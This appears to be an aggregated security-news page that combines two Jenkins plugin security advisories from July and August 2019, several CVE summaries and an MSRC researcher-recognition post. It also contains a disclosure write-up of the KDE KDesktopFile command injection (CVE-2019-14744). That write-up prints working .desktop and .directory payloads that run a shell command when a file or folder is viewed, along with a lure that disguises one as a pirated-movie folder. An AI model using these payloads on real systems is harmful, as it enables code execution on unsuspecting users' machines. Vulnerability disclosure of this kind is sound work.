Due to an incomplete fix of CVE-2019-10343, Jenkins Configuration as Code Plugin 1.26 and earlier did not properly apply masking to some values expected to be hidden when logging the configuration being applied.

This advisory announces vulnerabilities in the following Jenkins deliverables:

*   Avatar Plugin
*   Build Pipeline Plugin
*   Codefresh Integration Plugin
*   Configuration as Code Plugin
*   eggplant-plugin Plugin
*   File System SCM Plugin
*   Google Cloud Messaging Notification Plugin
*   GitLab Authentication Plugin
*   JClouds Plugin
*   Mask Passwords Plugin
*   PegDown Formatter Plugin
*   Relution Enterprise Appstore Publisher Plugin
*   Simple Travis Pipeline Runner Plugin
*   TestLink Plugin
*   VMware Lab Manager Slaves Plugin
*   Wall Display Master Project Plugin
*   XL TestView Plugin

**Descriptions****Configuration as Code Plugin failed to mask secrets in system log messages**

**SECURITY-1497 / CVE-2019-10367**  
**Severity (CVSS):** Medium  
**Affected plugin: configuration-as-code**  
**Description:**

Configuration as Code Plugin logs the changes it applies to the Jenkins system log. Secrets such as passwords should be masked (i.e. replaced with asterisks) in that log to prevent accidental disclosure. Configuration as Code Plugin inspects the type and looks for a field, getter, or constructor argument corresponding to the property, making the secret detection much more robust for the purpose of log message masking. This was implemented in the fix for SECURITY-1279 in the 2019-07-31 security advisory.

That fix was incomplete and did not cover a log message written to the logger io.jenkins.plugins.casc.impl.configurators.DataBoundConfigurator.

Configuration as Code Plugin now uses the same secret detection for these log messages.

As a workaround, administrators can configure the logging level of the logger io.jenkins.plugins.casc.impl.configurators.DataBoundConfigurator to a level that does not include these messages. Configuration as Code Plugin 1.25 and earlier logs these messages at the INFO level, Configuration as Code Plugin 1.26 logs them at FINE. See the logging documentation for details.

**CSRF vulnerability and missing permission check in JClouds Plugin allowed capturing credentials**

**SECURITY-1482 / CVE-2019-10368 (CSRF), CVE-2019-10369 (permission check)**  
**Severity (CVSS):** Medium  
**Affected plugin: jclouds-jenkins**  
**Description:**

JClouds Plugin did not perform permission checks on a method implementing form validation. This allowed users with Overall/Read access to Jenkins to connect to an attacker-specified URL using attacker-specified credentials IDs obtained through another method, capturing credentials stored in Jenkins.

Additionally, this form validation method did not require POST requests, resulting in a cross-site request forgery vulnerability.

This form validation method now requires POST requests and Overall/Administer permission.

**Mask Passwords Plugin shows plain text passwords in global configuration form fields**

**SECURITY-157 / CVE-2019-10370**  
**Severity (CVSS):** Low  
**Affected plugin: mask-passwords**  
**Description:**

Mask Passwords Plugin allows specifying passwords to be provided to builds in the global Jenkins configuration.

While the passwords are stored encrypted on disk, they are transmitted in plain text as part of the configuration form. This can result in exposure of the password through browser extensions, cross-site scripting vulnerabilities, and similar situations.

As of publication of this advisory, there is no fix.

**HTTP session fixation vulnerability in GitLab Authentication Plugin**

**SECURITY-795 / CVE-2019-10371**  
**Severity (CVSS):** Medium  
**Affected plugin: gitlab-oauth**  
**Description:**

GitLab Authentication Plugin does not invalidate the previous session and create a new one upon successful login. This allows attackers able to control or obtain another user’s pre-login session ID to impersonate them.

As of publication of this advisory, there is no fix.

**Open redirect vulnerability in GitLab Authentication Plugin**

**SECURITY-796 / CVE-2019-10372**  
**Severity (CVSS):** Medium  
**Affected plugin: gitlab-oauth**  
**Description:**

GitLab Authentication Plugin records the HTTP Referer header when the authentication process starts and redirects users to that URL when the user has finished logging in.

This implements an open redirect, allowing malicious sites to implement a phishing attack, with users expecting they have just logged in to Jenkins.

As of publication of this advisory, there is no fix.

**Stored XSS vulnerability in Build Pipeline Plugin**

**SECURITY-879 / CVE-2019-10373**  
**Severity (CVSS):** Medium  
**Affected plugin: build-pipeline-plugin**  
**Description:**

Build Pipeline Plugin does not properly escape variables in views, resulting in a stored cross-site scripting vulnerability exploitable by users with permission to configure build pipelines.

As of publication of this advisory, there is no fix.

**Stored XSS vulnerability in PegDown Formatter Plugin**

**SECURITY-142 / CVE-2019-10374**  
**Severity (CVSS):** Medium  
**Affected plugin: pegdown-formatter**  
**Description:**

PegDown Formatter Plugin uses the PegDown library to implement support for rendering Markdown formatted descriptions in Jenkins. It advertises disabling of HTML to prevent cross-site scripting (XSS) as a feature.

PegDown Formatter Plugin does not prevent the use of javascript: scheme in URLs for links. This results in an XSS vulnerability exploitable by users able to configure entities with descriptions or similar properties that are rendered by the configured markup formatter.

As of publication of this advisory, there is no fix.

**Arbitrary file read vulnerability in File System SCM Plugin**

**SECURITY-569 / CVE-2019-10375**  
**Severity (CVSS):** Medium  
**Affected plugin: filesystem_scm**  
**Description:**

File System SCM Plugin allows users able to configure jobs to read arbitrary files from the Jenkins controller, even if the job is running on an agent.

As of publication of this advisory, there is no fix.

**Reflected XSS vulnerability in Wall Display Master Project Plugin**

**SECURITY-751 / CVE-2019-10376**  
**Severity (CVSS):** Medium  
**Affected plugin: jenkinswalldisplay**  
**Description:**

Wall Display Master Project Plugin does not properly escape the customTheme query parameter, resulting in a reflected cross-site scripting vulnerability.

As of publication of this advisory, there is no fix.

**Avatar Plugin allows changing other users' avatars**

**SECURITY-1099 / CVE-2019-10377**  
**Severity (CVSS):** Medium  
**Affected plugin: avatar**  
**Description:**

Avatar Plugin does not implement a permission check for the HTTP URL used to replace user avatars. This allows any user with Overall/Read permission to change any other user’s avatar, in addition to their own.

As of publication of this advisory, there is no fix.

**TestLink Plugin stores credentials in plain text**

**SECURITY-1428 / CVE-2019-10378**  
**Severity (CVSS):** Low  
**Affected plugin: testlink**  
**Description:**

TestLink Plugin stores credentials unencrypted in its global configuration file hudson.plugins.testlink.TestLinkBuilder.xml on the Jenkins controller. These credentials can be viewed by users with access to the Jenkins controller file system.

As of publication of this advisory, there is no fix.

**Google Cloud Messaging Notification Plugin stores credentials in plain text**

**SECURITY-591 / CVE-2019-10379**  
**Severity (CVSS):** Low  
**Affected plugin: gcm-notification**  
**Description:**

Google Cloud Messaging Notification Plugin stores an API key unencrypted in its global configuration file org.jenkinsci.plugins.gcm.im.GcmPublisher.xml on the Jenkins controller. These credentials can be viewed by users with access to the Jenkins controller file system.

As of publication of this advisory, there is no fix.

**Script sandbox bypass vulnerability in Simple Travis Pipeline Runner Plugin**

**SECURITY-922 / CVE-2019-10380**  
**Severity (CVSS):** High  
**Affected plugin: simple-travis-runner**  
**Description:**

Simple Travis Pipeline Runner Plugin defines a custom list of pre-approved signatures for scripts protected by the Script Security sandbox.

This custom list of pre-approved signatures allows the use of methods that can be used to bypass Script Security sandbox protection. This results in arbitrary code execution on any Jenkins instance with this plugin installed.

As of publication of this advisory, there is no fix.

**Codefresh Integration Plugin globally and unconditionally disables SSL/TLS certificate validation**

**SECURITY-931 / CVE-2019-10381**  
**Severity (CVSS):** Medium  
**Affected plugin: codefresh**  
**Description:**

Codefresh Integration Plugin unconditionally disables SSL/TLS certificate validation for the entire Jenkins controller JVM.

As of publication of this advisory, there is no fix.

**VMware Lab Manager Slaves Plugin globally and unconditionally disables SSL/TLS certificate validation**

**SECURITY-1376 / CVE-2019-10382**  
**Severity (CVSS):** Medium  
**Affected plugin: labmanager**  
**Description:**

VMware Lab Manager Slaves Plugin unconditionally disables SSL/TLS certificate validation for the entire Jenkins controller JVM.

As of publication of this advisory, there is no fix.

**eggplant-plugin Plugin stores credentials in plain text**

**SECURITY-1430 / CVE-2019-10385**  
**Severity (CVSS):** Medium  
**Affected plugin: eggplant-plugin**  
**Description:**

eggplant-plugin Plugin stores credentials unencrypted in job config.xml files on the Jenkins controller. These credentials can be viewed by users with Extended Read permission, or access to the Jenkins controller file system.

As of publication of this advisory, there is no fix.

**CSRF vulnerability and missing permission check in XL TestView Plugin allow capturing credentials**

**SECURITY-1008 / CVE-2019-10386 (CSRF), CVE-2019-10387 (permission check)**  
**Severity (CVSS):** Medium  
**Affected plugin: xltestview-plugin**  
**Description:**

XL TestView Plugin does not perform permission checks on a method implementing form validation. This allows users with Overall/Read access to Jenkins to connect to an attacker-specified URL using attacker-specified credentials IDs obtained through another method, capturing credentials stored in Jenkins.

Additionally, this form validation method does not require POST requests, resulting in a cross-site request forgery vulnerability.

As of publication of this advisory, there is no fix.

**CSRF vulnerability and missing permission check in Relution Enterprise Appstore Publisher Plugin allow SSRF**

**SECURITY-1053 / CVE-2019-10388 (CSRF), CVE-2019-10389 (permission check)**  
**Severity (CVSS):** Medium  
**Affected plugin: relution-publisher**  
**Description:**

A missing permission check in a form validation method in Relution Enterprise Appstore Publisher Plugin allows users with Overall/Read permission to initiate a connection test to an attacker-specified URL using attacker-specified credentials and attacker-specified HTTP proxy configuration.

Additionally, the form validation method does not require POST requests, resulting in a CSRF vulnerability.

As of publication of this advisory, there is no fix.

**Severity**

*   SECURITY-142: Medium
*   SECURITY-157: Low
*   SECURITY-569: Medium
*   SECURITY-591: Low
*   SECURITY-751: Medium
*   SECURITY-795: Medium
*   SECURITY-796: Medium
*   SECURITY-879: Medium
*   SECURITY-922: High
*   SECURITY-931: Medium
*   SECURITY-1008: Medium
*   SECURITY-1053: Medium
*   SECURITY-1099: Medium
*   SECURITY-1376: Medium
*   SECURITY-1428: Low
*   SECURITY-1430: Medium
*   SECURITY-1482: Medium
*   SECURITY-1497: Medium

**Affected Versions**

*   **Avatar Plugin** up to and including 1.2
*   **Build Pipeline Plugin** up to and including 1.5.8
*   **Codefresh Integration Plugin** up to and including 1.8
*   **Configuration as Code Plugin** up to and including 1.26
*   **eggplant-plugin Plugin** up to and including 2.2
*   **File System SCM Plugin** up to and including 2.1
*   **Google Cloud Messaging Notification Plugin** up to and including 1.0
*   **GitLab Authentication Plugin** up to and including 1.4
*   **JClouds Plugin** up to and including 2.14
*   **Mask Passwords Plugin** up to and including 2.12.0
*   **PegDown Formatter Plugin** up to and including 1.3
*   **Relution Enterprise Appstore Publisher Plugin** up to and including 1.24
*   **Simple Travis Pipeline Runner Plugin** up to and including 1.0
*   **TestLink Plugin** up to and including 3.16
*   **VMware Lab Manager Slaves Plugin** up to and including 0.2.8
*   **Wall Display Master Project Plugin** up to and including 0.6.34
*   **XL TestView Plugin** up to and including 1.2.0

**Fix**

*   **Configuration as Code Plugin** should be updated to version 1.27
*   **JClouds Plugin** should be updated to version 2.15

These versions include fixes to the vulnerabilities described above. All prior versions are considered to be affected by these vulnerabilities unless otherwise indicated.

As of publication of this advisory, no fixes are available for the following plugins:

*   Avatar Plugin
*   Build Pipeline Plugin
*   Codefresh Integration Plugin
*   eggplant-plugin Plugin
*   File System SCM Plugin
*   Google Cloud Messaging Notification Plugin
*   GitLab Authentication Plugin
*   Mask Passwords Plugin
*   PegDown Formatter Plugin
*   Relution Enterprise Appstore Publisher Plugin
*   Simple Travis Pipeline Runner Plugin
*   TestLink Plugin
*   VMware Lab Manager Slaves Plugin
*   Wall Display Master Project Plugin
*   XL TestView Plugin

Learn why we announce these issues.

**Credit**

The Jenkins project would like to thank the reporters for discovering and reporting these vulnerabilities:

*   **Daniel Beck, CloudBees, Inc.** for SECURITY-879, SECURITY-931, SECURITY-1053, SECURITY-1376
*   **David Fiser of Trend Micro Nebula working with Trend Micro's Zero Day Initiative** for SECURITY-1428, SECURITY-1430
*   **Jesse Glick, CloudBees, Inc.** for SECURITY-922
*   **MWR labs (@mwrlabs)** for SECURITY-751
*   **Matthias Schmalz, SAP SE** for SECURITY-157
*   **Oleg Nenashev, CloudBees, Inc.** for SECURITY-1008, SECURITY-1099
*   **Oleg Nenashev, CloudBees, Inc., and, independently, Viktor Gazdag NCC Group** for SECURITY-1482
*   **Wadeck Follonier, CloudBees, Inc.** for SECURITY-795, SECURITY-796

CVE-2019-10367: Jenkins Security Advisory 2019-08-07

A reflected cross-site scripting vulnerability in Jenkins Wall Display Plugin 0.6.34 and earlier allows attackers to inject arbitrary HTML and JavaScript into web pages provided by this plugin.

CVE-2019-10376: Jenkins Security Advisory 2019-08-07

Jenkins VMware Lab Manager Slaves Plugin 0.2.8 and earlier disables SSL/TLS and hostname verification globally for the Jenkins master JVM.

CVE-2019-10382: Jenkins Security Advisory 2019-08-07

Jenkins Codefresh Integration Plugin 1.8 and earlier disables SSL/TLS and hostname verification globally for the Jenkins master JVM.

CVE-2019-10381: Jenkins Security Advisory 2019-08-07

In KDE Frameworks KConfig before 5.61.0, malicious desktop files and configuration files lead to code execution with minimal user interaction. This relates to libKF5ConfigCore.so, and the mishandling of .desktop and .directory files, as demonstrated by a shell command on an Icon line in a .desktop file.

\_ \_ \_\_\_\_\_\_\_ \_ \_\_ \_\_\_ | | \_\_\_ | | |\_ / \_ \\ '\_\_/ \_ \\ | |/ \_ \\| | / / \_\_/ | | (\_) || | (\_) | | /\_\_\_\\\_\_\_|\_| \\\_\_\_(\_)\_|\\\_\_\_/|\_| https://zero.lol zero days 4 days Title: KDE 4/5 KDesktopFile Command Injection Date: July 28th 2019 Author: Dominik Penner / zer0pwn Vendor Homepage: https://kde.org/ Software Link: https://cgit.kde.org Version: 5.60.0 and below Description: KDE 4/5 is vulnerable to a command injection vulnerability in the KDesktopFile class. When a .desktop or .directory file is instantiated, it unsafely evaluates environment variables and shell expansions using KConfigPrivate::expandString() via the KConfigGroup::readEntry() function. Using a specially crafted .desktop file a remote user could be compromised by simply downloading and viewing the file in their file manager, or by drag and dropping a link of it into their documents or desktop. The main issue at hand is the fact that the KDE configuration specification is inconsistent with that of XDG (freedesktop). Despite this, KDE mixes its configuration syntax with that of XDG's, allowing for dynamic configuration entries (https://userbase.kde.org/KDE\_System\_Administration/Configuration\_Files#Shell\_Expansion). When we combine this /feature/ with the way KDE handles .desktop and .directory files, we can force the file to evaluate some of the entries within the \[Desktop Entry\] tag. Some of the entries in this tag include "Icon", "Name", etc. The exploit is dependent on the entry that gets read by the KConfigGroup::readEntry() function. Generally whenever KDE needs to display these entries is when they'll get called. So for example, if we were to browse to the malicious file in our file manager (dolphin), the Icon entry would get called in order to display the icon. Since we know this, we can use a shell command in place of the Icon entry, which in turn will execute our command whenever the file is viewed. Theoretically, if we can control config entries and trigger their reading, we can achieve command injection / RCE. I imagine there must be more ways to abuse this, however this is the most reliable way I've discovered so far. Exploit/POCs: 1) payload.desktop \[Desktop Entry\] Icon\[$e\]=$(echo${IFS}0>~/Desktop/zero.lol&) 2) .directory \[Desktop Entry\] Type=Directory Icon\[$e\]=$(echo${IFS}0>~/Desktop/zero.lol&) Now whenever the files are viewed either in Dolphin, or on the Desktop (or while browsing an SMB share w/ smb4k) your commands will execute. The command processor doesn't seem to like spaces so just use $IFS and you'll be good. For the .desktop payload, it's as simple as having a remote user view the file on their local file system. The .directory payload has another part to it. .directory files are meant for setting configuration entries for the directory itself. Meaning we can set the Icon of the parent directory, and trigger it whenever someone views the folder. This requires nesting directories. Example: $ mkdir Hackers.1995.720p.BrRip.x264.YIFY $ cd Hackers.1995.720p.BrRip.x264.YIFY $ mkdir YIFY; cd YIFY $ vi .directory \[Desktop Entry\] Type=Directory Icon\[$e\]=$(echo${IFS}0>~/Desktop/zer0.lol&) Now whenever someone opens the "Hackers.1995.720p.BrRip.x264.YIFY" directory, the YIFY directory will attempt to load the Icon from the .directory file, executing our command(s). The code: ----------------kdesktopfile.cpp----------------------------------------------------- 182 QString KDesktopFile::readIcon() const 183 { 184 Q\_D(const KDesktopFile); 185 return d->desktopGroup.readEntry("Icon", QString()); <--------------------- 186 } ------------------------------------------------------------------------------------- -----------------kconfiggroup.cpp---------------------------------------------------- 679 QString KConfigGroup::readEntry(const char \*key, const QString &aDefault) const 680 { 681 Q\_ASSERT\_X(isValid(), "KConfigGroup::readEntry", "accessing an invalid group"); 682 683 bool expand = false; 684 685 // read value from the entry map 686 QString aValue = config()->d\_func()->lookupData(d->fullName(), key, KEntryMap::SearchLocalized, 687 &expand); 688 if (aValue.isNull()) { 689 aValue = aDefault; 690 } 691 692 if (expand) { 693 return KConfigPrivate::expandString(aValue); <------------------------- 694 } 695 696 return aValue; 697 } ------------------------------------------------------------------------------------- -----------------kconfig.cpp--------------------------------------------------------- 178 QString KConfigPrivate::expandString(const QString &value) 179 { 180 QString aValue = value; 181 182 // check for environment variables and make necessary translations 183 int nDollarPos = aValue.indexOf(QLatin1Char('$')); 184 while (nDollarPos != -1 && nDollarPos + 1 < aValue.length()) { 185 // there is at least one $ 186 if (aValue\[nDollarPos + 1\] == QLatin1Char('(')) { 187 int nEndPos = nDollarPos + 1; 188 // the next character is not $ 189 while ((nEndPos <= aValue.length()) && (aValue\[nEndPos\] != QLatin1Char(')'))) { 190 nEndPos++; 191 } 192 nEndPos++; 193 QString cmd = aValue.mid(nDollarPos + 2, nEndPos - nDollarPos - 3); 194 195 QString result; 196 197 // FIXME: wince does not have pipes 198 #ifndef \_WIN32\_WCE 199 FILE \*fs = popen(QFile::encodeName(cmd).data(), "r"); <----------- 200 if (fs) { 201 QTextStream ts(fs, QIODevice::ReadOnly); 202 result = ts.readAll().trimmed(); 203 pclose(fs); 204 } 205 #endif ------------------------------------------------------------------------------------- Remediation: Disable shell expansion / dynamic entries for \[Desktop Entry\] configurations.

CVE-2019-14744

Earlier today we announced MSRC’s 2018-2019 Most Valuable Security Researchers at Black Hat. The following 75 researchers hail from all corners of the world and possess varied experience and skills, yet all of them have contributed to securing the Microsoft’s customers and the broader ecosystem.
For over a decade, one of Microsoft’s partners in vulnerability research and disclosure has been Trend Micro’s Zero Day Initiative.

Earlier today we announced MSRC’s 2018-2019 Most Valuable Security Researchers at Black Hat. The following 75 researchers hail from all corners of the world and possess varied experience and skills, yet all of them have contributed to securing the Microsoft’s customers and the broader ecosystem.

For over a decade, one of Microsoft’s partners in vulnerability research and disclosure has been Trend Micro’s Zero Day Initiative. In addition to ZDI’s vulnerability rewards program, Trend Micro is a longstanding member of the Microsoft Active Protections Program (MAPP). This year Trend Micro’s original security research was tracked with the community contributions of the ZDI program, and subsequently only recognized in our individual Most Valuable Researcher program. Moving forward, Trend Micro original research will also be recognized in our MAPP Top Contributing Partners program, better recognizing the substantial impact Trend Micro has in protecting Microsoft customers as well as the broader ecosystem.

If you are interested in how we identified the Most Valuable Security Researchers this year, our Recognizing Security Researchers in 2019 blog provides additional details on our points model.

Looking forward to another great year working with all of you!

_Sylvie Liu, Security Program Manager, MSRC Community Programs_

Announcing 2019 MSRC Most Valuable Security Researchers

Jenkins Configuration as Code Plugin 1.24 and earlier did not properly apply masking to values expected to be hidden when logging the configuration being applied.

This advisory announces vulnerabilities in the following Jenkins deliverables:

*   Amazon EC2 Plugin
*   Configuration as Code Plugin
*   Google Kubernetes Engine Plugin
*   Maven Integration Plugin
*   Maven Release Plug-in Plugin
*   Pipeline: Deprecated Groovy Libraries Plugin
*   Script Security Plugin
*   Skytap Cloud CI Plugin

**Descriptions****Sandbox bypass through type casts in Script Security Plugin**

**SECURITY-1465 (1) / CVE-2019-10355**  
**Severity (CVSS):** High  
**Affected plugin: script-security**  
**Description:**

Sandbox protection in Script Security Plugin could be circumvented by casting crafted objects to other types. This allowed attackers able to specify sandboxed scripts to invoke constructors that weren’t approved.

Additionally, this could be used to read arbitrary files on the Jenkins controller.

Casting collections to other types as an alternative syntax for constructor invocation is now only allowed when the collection type is defined in java.util, and prohibited otherwise. Casting files and enums to arrays is now intercepted by the sandbox and treated as the invocation of an equivalent method.

**Sandbox bypass through method pointer expressions in Script Security Plugin**

**SECURITY-1465 (2) / CVE-2019-10356**  
**Severity (CVSS):** High  
**Affected plugin: script-security**  
**Description:**

Sandbox protection in Script Security Plugin could be circumvented through crafted subexpressions used as arguments to method pointer expressions. This allowed attackers able to specify sandboxed scripts to execute arbitrary code in the context of the Jenkins controller JVM.

Method pointer subexpressions are now subject to sandbox protection.

**Missing permission check in Pipeline: Deprecated Groovy Libraries Plugin**

**SECURITY-1422 / CVE-2019-10357**  
**Severity (CVSS):** Medium  
**Affected plugin: workflow-cps-global-lib**  
**Description:**

Pipeline: Deprecated Groovy Libraries Plugin provides form validation to determine whether the revision (e.g. commit, tag, or branch name) specified for a global library exists in the repository. This form validation method lacked a permission check, allowing attackers with Overall/Read access to determine whether an attacker-specified revision exists in an SCM repository configured for use in an existing shared library.

Pipeline: Deprecated Groovy Libraries Plugin now performs the appropriate permission check.

**Maven Integration Plugin did not mask sensitive values in module build logs**

**SECURITY-713 / CVE-2019-10358**  
**Severity (CVSS):** Medium  
**Affected plugin: maven-plugin**  
**Description:**

Maven Integration Plugin did not apply build log decorators from the Build Environment configuration to module builds. This could prevent sensitive content in module build logs from being masked.

Maven Integration Plugin now applies build log decorators from the Build Environment configuration to module builds.

**CSRF vulnerability in Maven Release Plug-in Plugin**

**SECURITY-1098 / CVE-2019-10359**  
**Severity (CVSS):** Medium  
**Affected plugin: m2release**  
**Description:**

Maven Release Plug-in Plugin did not require that requests sent to the endpoint used to initiate the release process use POST. This resulted in a cross-site request forgery vulnerability that allows attackers to perform releases.

Maven Release Plug-in Plugin now requires that these requests be sent via POST.

**Stored XSS vulnerability in Maven Release Plug-in Plugin**

**SECURITY-1184 / CVE-2019-10360**  
**Severity (CVSS):** Medium  
**Affected plugin: m2release**  
**Description:**

Maven Release Plug-in Plugin did not properly escape variables in multiple views, resulting in a stored cross-site scripting vulnerability.

Variables on affected views are now escaped.

**Maven Release Plug-in Plugin stored credentials in plain text**

**SECURITY-1435 / CVE-2019-10361**  
**Severity (CVSS):** Low  
**Affected plugin: m2release**  
**Description:**

Maven Release Plug-in Plugin stored credentials unencrypted in its global configuration file org.jvnet.hudson.plugins.m2release.M2ReleaseBuildWrapper.xml on the Jenkins controller. These credentials could be viewed by users with access to the Jenkins controller file system.

Maven Release Plug-in Plugin now stores credentials encrypted.

**Configuration as Code Plugin failed to mask secrets in system log messages**

**SECURITY-1279 / CVE-2019-10343**  
**Severity (CVSS):** Medium  
**Affected plugin: configuration-as-code**  
**Description:**

Configuration as Code Plugin logs the changes it applies to the Jenkins system log. Secrets such as passwords should be masked (i.e. replaced with asterisks) in that log to prevent accidental disclosure.

Between Configuration as Code Plugin 0.8-alpha and 1.0, log messages contained values if the values were specified using properties in the YAML file (SECURITY-929).

Since Configuration as Code Plugin 1.1, log messages in Configuration as Code Plugin instead mask values of type Secret, which is used in Jenkins to store the values encrypted on disk. This did not work in many instances, as plugins could use the Secret type to store credentials encrypted on disk while not having the Secret type appear in their Java API.

Configuration as Code Plugin now inspects the type and looks for a field, getter, or constructor argument corresponding to the property, making the secret detection much more robust for the purpose of log message masking.

As a workaround, administrators can configure the logging level of the logger io.jenkins.plugins.casc.Attribute to a level that does not include INFO messages. See the logging documentation for details.

**Configuration as Code Plugin allowed users without Overall/Administer permission to access documentation**

**SECURITY-1290 / CVE-2019-10344**  
**Severity (CVSS):** Medium  
**Affected plugin: configuration-as-code**  
**Description:**

Configuration as Code Plugin provides a generated schema and reference documentation for the configuration options supported on the current Jenkins instance. These URLs did not perform additional permission checks, resulting in their content being available to users with Overall/Read access. This included detailed information about installed plugins that may not be available otherwise.

Access to these URLs is now restricted to users with Overall/Administer permission.

**Configuration as Code Plugin did not mask proxy credentials**

**SECURITY-1303 / CVE-2019-10345**  
**Severity (CVSS):** Low  
**Affected plugin: configuration-as-code**  
**Description:**

Configuration as Code Plugin provides a custom configurator for the Jenkins proxy configuration.

This feature did not mask the password for logging or encrypt it in the export.

Configuration as Code Plugin 1.20 and newer mask the Jenkins proxy password when logged and only store it encrypted in the export.

**Configuration as Code Plugin evaluated variable references when importing a previously exported configuration**

**SECURITY-1446 / CVE-2019-10362**  
**Severity (CVSS):** Medium  
**Affected plugin: configuration-as-code**  
**Description:**

Configuration as Code Plugin allows exporting the live Jenkins configuration, as well as importing and applying a configuration provided in the same format. One of the features of the import is that it allows specifying variable references (e.g. ${VARIABLE_NAME}) in the configuration YAML file. These will be replaced by the value of the corresponding environment variable (or other source of secrets) during import (interpolation). If such a value should not be interpolated, the escape character ^ can be used before (e.g. ^${VARIABLE_NAME}).

Exporting did not add ^ escape characters to exported strings, such as various entity descriptions. This allowed attackers with permission to configure certain entities, such as credentials or agents, to specify crafted descriptions containing variable references. These would be replaced by the corresponding environment variable’s value during a subsequent import.

The export now adds ^ escape characters to exported strings as needed to prevent them from being interpolated during import. Previously exported configurations may require manual cleanup by Jenkins admins before being imported.

**Configuration as Code Plugin exported secret values in plain text**

**SECURITY-1458 / CVE-2019-10363**  
**Severity (CVSS):** Medium  
**Affected plugin: configuration-as-code**  
**Description:**

Configuration as Code Plugin allows to export the current Jenkins configuration as a YAML file. Secrets such as passwords should be exported in their encrypted form to prevent accidental disclosure.

Configuration as Code Plugin did not reliably detect which values in the exported YAML file need to be considered sensitive (e.g. credentials and other secrets), as plugins could use the Secret type to store credentials encrypted on disk while not having the Secret type appear in their Java API. This resulted in credentials being exported in plain text in some cases.

Configuration as Code Plugin now inspects the type and looks for a field, getter, or constructor argument corresponding to the property, making the secret detection much more robust for the purpose of exporting encrypted secrets.

**Amazon EC2 Plugin leaked beginning of private key in system log**

**SECURITY-673 / CVE-2019-10364**  
**Severity (CVSS):** Medium  
**Affected plugin: ec2**  
**Description:**

Amazon EC2 Plugin printed a log message that contained the beginning of the private key to the Jenkins system log.

The log message no longer includes the beginning of the private key.

**Google Kubernetes Engine Plugin stored temporary secret in a user accessible location**

**SECURITY-1345 / CVE-2019-10365**  
**Severity (CVSS):** Medium  
**Affected plugin: google-kubernetes-engine**  
**Description:**

Google Kubernetes Engine Plugin created a temporary file named .kube…config containing a temporary access token in the project workspace. This allowed the file to be accessed via workspace browsers, or accidentally archived, disclosing the token.

This temporary file is now created outside the regular project workspace.

**Skytap Cloud CI Plugin stored credentials in plain text**

**SECURITY-1429 / CVE-2019-10366**  
**Severity (CVSS):** Medium  
**Affected plugin: skytap**  
**Description:**

Skytap Cloud CI Plugin stored credentials unencrypted in job config.xml files on the Jenkins controller. These credentials could be viewed by users with Extended Read permission, or access to the Jenkins controller file system.

Skytap Cloud CI Plugin now stores credentials encrypted.

**Severity**

*   SECURITY-673: Medium
*   SECURITY-713: Medium
*   SECURITY-1098: Medium
*   SECURITY-1184: Medium
*   SECURITY-1279: Medium
*   SECURITY-1290: Medium
*   SECURITY-1303: Low
*   SECURITY-1345: Medium
*   SECURITY-1422: Medium
*   SECURITY-1429: Medium
*   SECURITY-1435: Low
*   SECURITY-1446: Medium
*   SECURITY-1458: Medium
*   SECURITY-1465 (1): High
*   SECURITY-1465 (2): High

**Affected Versions**

*   **Amazon EC2 Plugin** up to and including 1.43
*   **Configuration as Code Plugin** up to and including 1.24
*   **Google Kubernetes Engine Plugin** up to and including 0.6.2
*   **Maven Integration Plugin** up to and including 3.3
*   **Maven Release Plug-in Plugin** up to and including 0.14.0
*   **Pipeline: Deprecated Groovy Libraries Plugin** up to and including 2.14
*   **Script Security Plugin** up to and including 1.61
*   **Skytap Cloud CI Plugin** up to and including 2.06

**Fix**

*   **Amazon EC2 Plugin** should be updated to version 1.44
*   **Configuration as Code Plugin** should be updated to version 1.25
*   **Google Kubernetes Engine Plugin** should be updated to version 0.6.3
*   **Maven Integration Plugin** should be updated to version 3.4
*   **Maven Release Plug-in Plugin** should be updated to version 0.15.0
*   **Pipeline: Deprecated Groovy Libraries Plugin** should be updated to version 2.15
*   **Script Security Plugin** should be updated to version 1.62
*   **Skytap Cloud CI Plugin** should be updated to version 2.07

These versions include fixes to the vulnerabilities described above. All prior versions are considered to be affected by these vulnerabilities unless otherwise indicated.

**Credit**

The Jenkins project would like to thank the reporters for discovering and reporting these vulnerabilities:

*   **Alex Earl (@alexcearl), Marvell Semiconductor, Inc., and Daniel Beck, CloudBees, Inc.** for SECURITY-1422
*   **Daniel Beck, CloudBees, Inc.** for SECURITY-1184
*   **David Fiser of Trend Micro Nebula working with Trend Micro's Zero Day Initiative** for SECURITY-1429, SECURITY-1435
*   **Jesse Glick, CloudBees, Inc.** for SECURITY-713, SECURITY-1345
*   **Mikaël Barbero (Eclipse Foundation)** for SECURITY-1290
*   **Oleg Nenashev, CloudBees, Inc.** for SECURITY-1098
*   **Wadeck Follonier, CloudBees, Inc.** for SECURITY-1446

CVE-2019-10343: Jenkins Security Advisory 2019-07-31

A cross-site request forgery vulnerability in Jenkins Maven Release Plugin 0.14.0 and earlier in the M2ReleaseAction#doSubmit method allowed attackers to perform releases with attacker-specified options.

CVE-2019-10359: Jenkins Security Advisory 2019-07-31

A stored cross site scripting vulnerability in Jenkins Maven Release Plugin 0.14.0 and earlier allowed attackers to inject arbitrary HTML and JavaScript in the plugin-provided web pages in Jenkins.

Tag

#zero_day